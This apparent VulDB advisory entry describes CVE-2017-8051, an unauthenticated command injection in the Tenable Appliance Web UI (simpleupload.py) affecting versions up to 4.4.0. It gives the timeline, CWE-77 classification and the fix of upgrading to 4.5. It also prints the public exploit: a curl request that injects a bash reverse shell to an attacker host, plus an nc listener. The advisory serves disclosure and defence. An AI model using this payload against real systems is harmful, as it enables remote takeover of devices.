Tenable Appliance up to 4.4.0 Web UI simpleupload.py tns_appliance_session_user command injection

Summaryinfo

A vulnerability identified as critical has been detected in Tenable Appliance up to 4.4.0. The impacted element is an unknown function of the file simpleupload.py of the component Web UI. This manipulation of the argument tns_appliance_session_user causes command injection. The identification of this vulnerability is CVE-2017-8051. It is possible to initiate the attack remotely. Furthermore, there is an exploit available. This vulnerability is considered historic because of its background and reception. You should upgrade the affected component.

Detailsinfo

A vulnerability classified as critical was found in Tenable Appliance up to 4.4.0. Affected by this vulnerability is some unknown functionality of the file simpleupload.py of the component Web UI. The manipulation of the argument tns_appliance_session_user with an unknown input leads to a command injection vulnerability. The CWE definition for the vulnerability is CWE-77. The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. As an impact it is known to affect confidentiality, integrity, and availability. The summary by CVE is:

Tenable Appliance 3.5 - 4.4.0, and possibly prior versions, contains a flaw in the simpleupload.py script in the Web UI. Through the manipulation of the tns_appliance_session_user parameter, a remote attacker can inject arbitrary commands.

The bug was discovered 04/18/2017. The weakness was shared 04/21/2017 as EDB-ID 41892 as confirmed exploit (Exploit-DB). It is possible to read the advisory at exploit-db.com. This vulnerability is known as CVE-2017-8051 since 04/21/2017. The attack can be launched remotely. The exploitation doesn't need any form of authentication. Technical details and also a public exploit are known. The pricing for an exploit might be around USD $0-$5k at the moment (estimation calculated on 01/02/2025). The attack technique deployed by this issue is T1202 according to MITRE ATT&CK. Due to its background and reception, this vulnerability has a historic impact.

A public exploit has been developed by agix and been published even before and not after the advisory. It is possible to download the exploit at exploit-db.com. It is declared as proof-of-concept. The vulnerability was handled as a non-public zero-day exploit for at least 3 days. During that time the estimated underground price was around $25k-$100k. The commercial vulnerability scanner Qualys is able to test this issue with plugin 11802 (Tenable Appliance Multiple Security Vulnerabilities). The code used by the exploit is:

curl -k "https://$TENABLE_IP:8000/simpleupload.py" --data $'returnpage=/&action=a&tns_appliance_session_token=61:62&tns_appliance_session_user=a"\'%0abash -i >%26 /dev/tcp/'$YOUR_IP'/'$LISTEN_PORT' 0>%261%0aecho '&
nc -l -p $LISTEN_PORT

Upgrading to version 4.5 eliminates this vulnerability.

The vulnerability is also documented in the vulnerability database at Exploit-DB (41892). The entries VDB-97730 and VDB-100458 are related to this item. Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Productinfo

Vendor

• Tenable

Name

• Appliance

Version

• 4.0
• 4.1
• 4.2
• 4.3
• 4.4.0

License

• free

CPE 2.3info

• 🔍
• 🔍
• 🔍

CPE 2.2info

• 🔍
• 🔍
• 🔍

CVSSv4info

CVSSv3info

CVSSv2info

Exploitinginfo

Threat Intelligenceinfo

Countermeasuresinfo

Timelineinfo

Sourcesinfo

Entryinfo

Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Discussion